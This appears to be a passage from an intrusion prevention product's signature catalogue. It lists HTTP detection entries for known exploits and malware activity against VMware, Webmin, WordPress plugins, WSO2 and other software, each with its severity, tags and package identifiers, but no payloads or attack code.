HTTP_CS-VMware-ESX-And-ESXi-Server-Soap-Request-Handling-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in VMWare ESX detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, EMC VMware ESX Server, EMC VMware ESXi Server, CVE2012, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-498-5211
Last changed: sgpkg-ips-556-5211
Vulnerability: VMware-ESX-And-ESXi-Server-Soap-Request-Handling-Denial-Of-Service
Description:
Back to top

HTTP_CS-VMware-Server-Isapi-Extension-Remote-Denial-Of-Service

About this situation: An attempt to exploit a denial of service vulnerability in VMWare Server detected
Context: HTTP Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, EMC VMware Server, CVE2008, Any Operating System not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-418-4219
Last changed: sgpkg-ips-418-4219
Vulnerability: VMware-Server-Isapi-Extension-Remote-Denial-Of-Service
Description:
Back to top

HTTP_CS-VMware-Vcenter-Chargeback-Manager-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in VMware vCenter Chargeback Manager detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows, x86, VMware vCenter Chargeback Manager, CVE2013, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-596-5211
Last changed: sgpkg-ips-596-5211
Vulnerability: VMware-Vcenter-Chargeback-Manager-Remote-Code-Execution
Description:
Back to top

HTTP_CS-VMware-Vcenter-Server-Remote-Code-Execution-CVE-2021-21972

About this situation: An attempt to exploit a vulnerability in VMware vCenter Server detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, VMware Cloud Foundation, VMware vCenter Server, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1340-5242
Last changed: sgpkg-ips-1340-5242
Vulnerability: VMware-Vcenter-Server-Remote-Code-Execution-CVE-2021-21972
Description:
Back to top

HTTP_CS-Voltronic-Power-Viewpower-Pro-Uploadaction-Unrestricted-File-Upload

About this situation: An attempt to exploit a vulnerability in Voltronic Power ViewPower Pro detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Voltronic Power ViewPower Pro, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1678-5242
Last changed: sgpkg-ips-1678-5242
Vulnerability: Voltronic-Power-Viewpower-Pro-Uploadaction-Unrestricted-File-Upload
Description:
Back to top

HTTP_CS-Voltronic-Power-Viewpower-Pro-Uploadaction-Unrestricted-File-Upload-2

About this situation: An attempt to exploit a vulnerability in Voltronic Power ViewPower Pro detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Voltronic Power ViewPower Pro, CVE2023, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1678-5242
Last changed: sgpkg-ips-1678-5242
Vulnerability: Voltronic-Power-Viewpower-Pro-Uploadaction-Unrestricted-File-Upload
Description:
Back to top

HTTP_CS-Vtiger-CRM-Authenticated-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in vTiger CRM detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, vTiger CRM, CVE2013, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-595-5211
Last changed: sgpkg-ips-1272-5242
Vulnerability: Vtiger-CRM-Authenticated-Remote-Code-Execution
Description:
Back to top

HTTP_CS-Vtiger-Install-Module-Remote-Command-Execution

About this situation: An attempt to exploit a Vtiger Install Module Remote Command Execution vulnerability detected.
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, vTiger CRM, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-697-5211
Last changed: sgpkg-ips-1721-5242
Vulnerability: Vtiger-Install-Module-Remote-Command-Execution
Description:
Back to top

HTTP_CS-W32/Polybot@mm-Activity

About this situation: W32/polybot@mm activity detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-622-5211
Vulnerability: W32/Polybot@mm-Malware
Description:
Back to top

HTTP_CS-W32/Sdbot.worm.gen-Activity

About this situation: W32/Sdbot.worm.gen activity detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-622-5211
Vulnerability: W32/Sdbot.worm.gen-Malware
Description:
Back to top

HTTP_CS-WebCalendar-Remote-Code-Injection

About this situation: An attempt to exploit a WebCalendar Remote Code Injection vulnerability detected.
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, WebCalendar, CVE2012, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-706-5211
Last changed: sgpkg-ips-706-5211
Vulnerability: WebCalendar-Remote-Code-Injection
Description:
Back to top

HTTP_CS-Webmin-Command-Shell-Index.cgi-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Webmin Webmin detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Webmin, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1320-5242
Last changed: sgpkg-ips-1320-5242
Vulnerability: Webmin-Command-Shell-Index.cgi-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CS-Webmin-Upload-Authenticated-RCE

About this situation: An attempt to exploit a vulnerability in Webmin detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Webmin, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1197-5242
Last changed: sgpkg-ips-1197-5242
Vulnerability: Webmin-Upload-Authenticated-RCE
Description:
Back to top

HTTP_CS-WebsitePro-Path-Disclosure

About this situation: Path disclosure in WebsitePro
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, O'Reilly Software WebSite, CVE2000, Windows not specific, Disclosure, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-5-1102
Last changed: sgpkg-ips-234-3038
Vulnerability: HTTP-WebsitePro-Path-Disclosure
Description:
Back to top

HTTP_CS-Western-Digital-MyCloud-Unauthenticated-Command-Injection

About this situation: An attempt to exploit a vulnerability in Western Digital MyCloud detected
Context: HTTP Client Stream
Severity: 7
Tags: Unix, Linux, Any Hardware, WD MyCloud, CVE2016, Unix not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1718-5242
Last changed: sgpkg-ips-1725-5242
Vulnerability: Western-Digital-MyCloud-Unauthenticated-Command-Injection
Description:
Back to top

HTTP_CS-Whisker-Scan-Detect

About this situation: Whisker Vulnerability Scanner
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Probe, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-563-5211
Vulnerability: HTTP-Whisker-Vulnerability-Scanner
Description:
Back to top

HTTP_CS-WikkaWiki-Remote-PHP-Injection

About this situation: An attempt to exploit a WikkaWiki Remote PHP Injection vulnerability detected.
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, WikkaWiki, CVE2011, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-712-5211
Last changed: sgpkg-ips-712-5211
Vulnerability: WikkaWiki-Remote-PHP-Injection
Description:
Back to top

HTTP_CS-Windows-Explorer-HTA-CLSID-System-Compromise

About this situation: Detects attempts to exploit the Windows Explorer HTA vulnerability over WebDAV
Context: HTTP Client Stream
Severity: 7
Tags: Windows 2003, Windows 2000 SP4, Windows XP SP1, Windows XP SP2, x86, MS2006-08, CVE2006, Windows 2003 not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-75-1314
Last changed: sgpkg-ips-640-5211
Vulnerability: Windows-Explorer-HTA-CLSID-System-Compromise
Description:
Back to top

HTTP_CS-Windows-Media-Services-MX-STATS-LogLine-NSIISlog-DLL-BOF

About this situation: Attempt to exploit a buffer overflow in MS Windows Media Services
Context: HTTP Client Stream
Severity: 10
Tags: Windows 2000, Windows NT 4.0, Any Hardware, Windows Media Services, Windows 2000 not specific, Windows NT 4.0 not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-17-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: Windows-Media-Services-MX_STATS_LogLine-NSIISlog-DLL-BOF
Description:
Back to top

HTTP_CS-Windows-Media-Services-NSIISlog-DLL-BOF

About this situation: Attempt to exploit a buffer overflow in Windows Media Services NSIISlog.dll
Context: HTTP Client Stream
Severity: 10
Tags: Windows, Any Hardware, IIS, Windows Media Services, MS2003, CVE2003, Windows not specific, IIS not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-17-1210
Last changed: sgpkg-ips-503-5211
Vulnerability: Windows-Media-Services-NSIISlog-DLL-BOF
Description:
Back to top

HTTP_CS-Windows-Remote-Management-Activity

About this situation: Windows Remote Management activity was detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1219-5242
Last changed: sgpkg-ips-1219-5242
Vulnerability: Windows-Remote-Management-Activity
Description:
Back to top

HTTP_CS-Wordpress-AIT-CSV-Import-Export-Unauthenticated-RCE

About this situation: An attempt to exploit a vulnerability in Wordpress AIT CSV Import/Export plugin detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Wordpress AIT CSV Import Export plugin, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1340-5242
Last changed: sgpkg-ips-1340-5242
Vulnerability: Wordpress-AIT-CSV-Import-Export-Unauthenticated-RCE
Description:
Back to top

HTTP_CS-Wordpress-Backup-Migration-Plugin-Ajax.php-Url-Command-Injection

About this situation: An attempt to exploit a vulnerability in the WordPress plugin Backup Migration detected.
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress Backup Migration Plugin, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1692-5242
Last changed: sgpkg-ips-1692-5242
Vulnerability: Wordpress-Backup-Migration-Plugin-Ajax.php-Url-Command-Injection
Description:
Back to top

HTTP_CS-Wordpress-Backup-Migration-Plugin-Backup-heart.php-Possible-File-Inclusion

About this situation: An attempt to exploit a vulnerability in WordPress Backup Migration Plugin detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress, CVE2023, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1675-5242
Last changed: sgpkg-ips-1675-5242
Vulnerability: Wordpress-Backup-Migration-Plugin-Backup-heart.php-Remote-Code-Execution
Description:
Back to top

HTTP_CS-Wordpress-Backup-Migration-Plugin-Backup-heart.php-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in WordPress Backup Migration Plugin detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1675-5242
Last changed: sgpkg-ips-1754-5242
Vulnerability: Wordpress-Backup-Migration-Plugin-Backup-heart.php-Remote-Code-Execution
Description:
Back to top

HTTP_CS-Wordpress-Drag-And-Drop-Multi-File-Uploader-RCE

About this situation: An attempt to exploit a vulnerability in Wordpress Drag And Drop Plugin detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Wordpress Drag And Drop Plugin, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1340-5242
Last changed: sgpkg-ips-1570-5242
Vulnerability: Wordpress-Drag-And-Drop-Multi-File-Uploader-RCE
Description:
Back to top

HTTP_CS-Wordpress-Email-Subscribers-And-Newsletters-Hash-SQLi-Scanner

About this situation: An attempt to scan WordPress Email Subscribers and Newsletters plugin detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress Subscribers And Newsletters Plugin, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1338-5242
Last changed: sgpkg-ips-1338-5242
Vulnerability: Wordpress-Email-Subscribers-And-Newsletters-Hash-SQLi-Scanner
Description:
Back to top

HTTP_CS-Wordpress-Email-Template-Designer-Plugin-Authentication-Bypass

About this situation: An attempt to exploit a vulnerability in WordPress Project WordPress Email Template Designer - WP HTML Mail Plugin detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1444-5242
Last changed: sgpkg-ips-1725-5242
Vulnerability: Wordpress-Email-Template-Designer-Plugin-Authentication-Bypass
Description:
Back to top

HTTP_CS-Wordpress-File-Manager-Advanced-Shortcode-RCE

About this situation: An attempt to exploit a vulnerability in WordPress File Manager Advanced Shortcode Plugin detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress File Manager Advanced Shortcode Plugin, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1729-5242
Last changed: sgpkg-ips-1729-5242
Vulnerability: Wordpress-File-Manager-Advanced-Shortcode-RCE
Description:
Back to top

HTTP_CS-Wordpress-Holding-Pattern-Theme-Arbitrary-File-Upload

About this situation: An attempt to exploit a Wordpress Holding Pattern Theme Arbitrary File Upload vulnerability detected.
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress Holding Pattern, CVE2015, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-686-5211
Last changed: sgpkg-ips-695-5211
Vulnerability: Wordpress-Holding-Pattern-Theme-Arbitrary-File-Upload
Description:
Back to top

HTTP_CS-Wordpress-Kadence-Blocks-Plugin-Advanced-Form-Unrestricted-File-Upload

About this situation: An attempt to exploit a vulnerability in WordPress Kadence Blocks Plugin detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1629-5242
Last changed: sgpkg-ips-1629-5242
Vulnerability: Wordpress-Kadence-Blocks-Plugin-Advanced-Form-Unrestricted-File-Upload
Description:
Back to top

HTTP_CS-Wordpress-Learnpress-Plugin-Handle_params_For_Query_courses-SQL-Injection

About this situation: An attempt to exploit a vulnerability in WordPress Project LearnPress Plugin detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress Project LearnPress Plugin, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1681-5242
Last changed: sgpkg-ips-1681-5242
Vulnerability: Wordpress-Learnpress-Plugin-Handle_params_For_Query_courses-SQL-Injection
Description:
Back to top

HTTP_CS-Wordpress-Learnpress-Plugin-Profile-Settings-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in WordPress Project LearnPress Plugin detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1404-5242
Last changed: sgpkg-ips-1618-5242
Vulnerability: Wordpress-Learnpress-Plugin-Profile-Settings-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CS-Wordpress-Paid-Memberships-Pro-Plugin-Arbitrary-File-Upload

About this situation: An attempt to exploit a vulnerability in the WordPress Paid Memberships Pro Plugin detected.
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Wordpress Paid Membership, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1697-5242
Last changed: sgpkg-ips-1725-5242
Vulnerability: Wordpress-Paid-Memberships-Pro-Plugin-Arbitrary-File-Upload
Description:
Back to top

HTTP_CS-Wordpress-Photo-Gallery-Unrestricted-File-Upload

About this situation: An attempt to exploit a Wordpress Photo Gallery Unrestricted File Upload vulnerability detected.
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress Photo Gallery, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-687-5211
Last changed: sgpkg-ips-695-5211
Vulnerability: Wordpress-Photo-Gallery-Unrestricted-File-Upload
Description:
Back to top

HTTP_CS-Wordpress-Pingback

About this situation: WordPress Pingback detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress, Any Operating System not specific, Suspected Denial of Service, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-570-5211
Last changed: sgpkg-ips-570-5211
Description:
Back to top

HTTP_CS-Wordpress-Plugin-Backup-Guard-Authenticated-RCE

About this situation: An attempt to exploit a vulnerability in Wordpress Backup Guard Plugin detected.
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Wordpress Backup Guard Plugin, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1401-5242
Last changed: sgpkg-ips-1401-5242
Vulnerability: Wordpress-Plugin-Backup-Guard-Authenticated-RCE
Description:
Back to top

HTTP_CS-Wordpress-Plugin-Catch-Themes-Demo-Import-RCE

About this situation: An attempt to exploit a vulnerability in the Wordpress Catch Themes Demo Plugin detected.
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Wordpress Catch Themes Demo Import Plugin, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1435-5242
Last changed: sgpkg-ips-1729-5242
Vulnerability: Wordpress-Plugin-Catch-Themes-Demo-Import-RCE
Description:
Back to top

HTTP_CS-Wordpress-Plugin-Modern-Events-Calendar-Authenticated-RCE

About this situation: An attempt to exploit a vulnerability in Wordpress Modern Events Calendar Plugin detected.
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Wordpress Modern Events Calendar Plugin, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1401-5242
Last changed: sgpkg-ips-1401-5242
Vulnerability: Wordpress-Plugin-Modern-Events-Calendar-Authenticated-RCE
Description:
Back to top

HTTP_CS-Wordpress-Plugin-SP-Project-And-Document-Authenticated-RCE

About this situation: An attempt to exploit a vulnerability in Wordpress SP Project And Document Plugin detected.
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Wordpress SP Project And Document Plugin, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1401-5242
Last changed: sgpkg-ips-1401-5242
Vulnerability: Wordpress-Plugin-SP-Project-And-Document-Authenticated-RCE
Description:
Back to top

HTTP_CS-Wordpress-Plugin-Woocommerce-Payments-Unauthenticated-Admin-Creation

About this situation: An attempt to exploit a vulnerability in WooCommerce-Payments plugin for Wordpress detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, WooCommerce-Payments Plugin, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1625-5242
Last changed: sgpkg-ips-1625-5242
Vulnerability: Wordpress-Plugin-Woocommerce-Payments-Unauthenticated-Admin-Creation
Description:
Back to top

HTTP_CS-Wordpress-Royal-Elementor-Addons-And-Templates-Plugin-Unrestricted-File-Upload

About this situation: An attempt to exploit a vulnerability in WordPress Project Royal Elementor Addons and Templates Plugin detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1709-5242
Last changed: sgpkg-ips-1710-5242
Vulnerability: Wordpress-Royal-Elementor-Addons-And-Templates-Plugin-Unrestricted-File-Upload
Description:
Back to top

HTTP_CS-Wordpress-Simple-File-List-Plugin-Unauthenticated-RCE

About this situation: An attempt to exploit a vulnerability in WordPress Simple File List Plugin detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress Simple File List Plugin, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1340-5242
Last changed: sgpkg-ips-1340-5242
Vulnerability: Wordpress-Simple-File-List-Plugin-Unauthenticated-RCE
Description:
Back to top

HTTP_CS-Wordpress-Tribulant-Slideshow-Gallery-PHP-File-Upload

About this situation: An attempt to exploit a Wordpress Tribulant Slideshow Gallery PHP File Upload vulnerability.
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress Tribulant Slideshow Gallery, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-696-5211
Last changed: sgpkg-ips-697-5211
Vulnerability: Wordpress-Tribulant-Slideshow-Gallery-PHP-File-Upload
Description:
Back to top

HTTP_CS-Wordpress-WP-Time-Capsule-Arbitrary-File-Upload

About this situation: An attempt to exploit a vulnerability in WordPress detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress, CVE2024, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1814-5242
Last changed: sgpkg-ips-1814-5242
Vulnerability: Wordpress-WP-Time-Capsule-Arbitrary-File-Upload
Description:
Back to top

HTTP_CS-Wordpress-Wp-Time-Capsule-Plugin-Uploadhandler-Unrestricted-File-Upload

About this situation: An attempt to exploit a vulnerability in WordPress Project WP Time Capsule
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1834-5242
Last changed: sgpkg-ips-1834-5242
Vulnerability: Wordpress-Wp-Time-Capsule-Plugin-Uploadhandler-Unrestricted-File-Upload
Description:
Back to top

HTTP_CS-Wordpress-wpDiscuz-Unauthenticated-File-Upload

About this situation: An attempt to exploit a vulnerability in WordPress wpDiscuz detected.
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress wpDiscuz, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1364-5242
Last changed: sgpkg-ips-1570-5242
Vulnerability: Wordpress-wpDiscuz-Unauthenticated-File-Upload
Description:
Back to top

HTTP_CS-WPEverest-WordPess-Plugin-Arbitrary-File-Upload

About this situation: An attempt to exploit a vul
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1657-5242
Last changed: sgpkg-ips-1657-5242
Vulnerability: WPEverest-WordPess-Plugin-Arbitrary-File-Upload
Description:
Back to top

HTTP_CS-WSO2-Unrestricted-File-Upload-CVE-2022-29464

About this situation: An attempt to exploit a vulnerability in WSO2 detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, WSO2, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1458-5242
Last changed: sgpkg-ips-1621-5242
Vulnerability: WSO2-Unrestricted-File-Upload-CVE-2022-29464
Description:
Back to top

HTTP_CS-X-Forwarded-For-Header-Detected

About this situation: HTTP X-Forwarded-For header detected
Context: HTTP Client Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-553-5211
Last changed: sgpkg-ips-553-5211
Description:
Back to top

HTTP_CS-xArrow-Webserver-DoS

About this situation: A vulnerability in xArrow Webserver software, allowing DoS.
Context: HTTP Client Stream
Severity: 2
Tags: Windows, Any Hardware, xArrow, Windows not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: xArrow-Webserver-DoS
Description:
Back to top

HTTP_CS-Xml-Dtd-External-Entity-Multiple-Vulnerabilities

About this situation: XML DTD external entity declaration detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Java Runtime Environment, Apache ActiveMQ, Apache Camel, Oracle JRockit, Oracle Java SE Embedded, Oracle OpenJDK, Oracle Java Development Kit, Zend Framework, SpringSource Spring Framework, CVE2009, CVE2012, CVE2013, CVE2014, CVE2019, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-542-5211
Last changed: sgpkg-ips-1769-5242
Vulnerability: Zend-Technologies-Zend-Framework-Zend_XmlRpc-Information-Disclosure
Springsource-Spring-Framework-XML-External-Entity-Information-Disclosure
Springsource-Spring-Framework-Sourcehttpmessageconverter-Xxe-Vulnerability
Apache-Camel-XSLT-Component-Xml-External-Entity
Oracle-Java-Beans-Documenthandler-Xml-External-Entity
